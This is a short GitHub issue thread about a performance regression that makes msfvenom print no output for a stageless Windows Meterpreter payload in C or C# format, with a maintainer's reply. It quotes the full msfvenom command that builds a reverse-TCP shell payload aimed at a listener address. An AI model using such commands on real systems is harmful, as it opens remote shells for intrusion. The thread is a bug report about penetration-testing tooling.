### ISSUE TITLE
msfvenom did not generate stageless meterpreter in c

### ISSUE THREAD

**Issue by exploiting-systems** [rapid7/metasploit-framework#17245]
"msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f c" has no output. It's the same issue with csharp

Kali Linux 2022.2 and 2022.3

I use Kali Linux 2022.1 to avoid this problem but then i can't update my system to newer versions

$ msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f csharp                                       
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload

<AND THEN THERE IS NO OUTPUT>

**Comment by adfoster-r7** [comment]
Looks like a regression in performance; Metasploit 5.0.101 completes in 5 seconds

```
./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -  5.55s user 4.84s system 82% cpu 12.569 total
```

Would need to do a bisect to see where the issue has cropped up; I thought it might've been caused by https://github.com/rapid7/rex-text/pull/53 but that doesn't appear to be the case as the commit prior seems to be slow too.
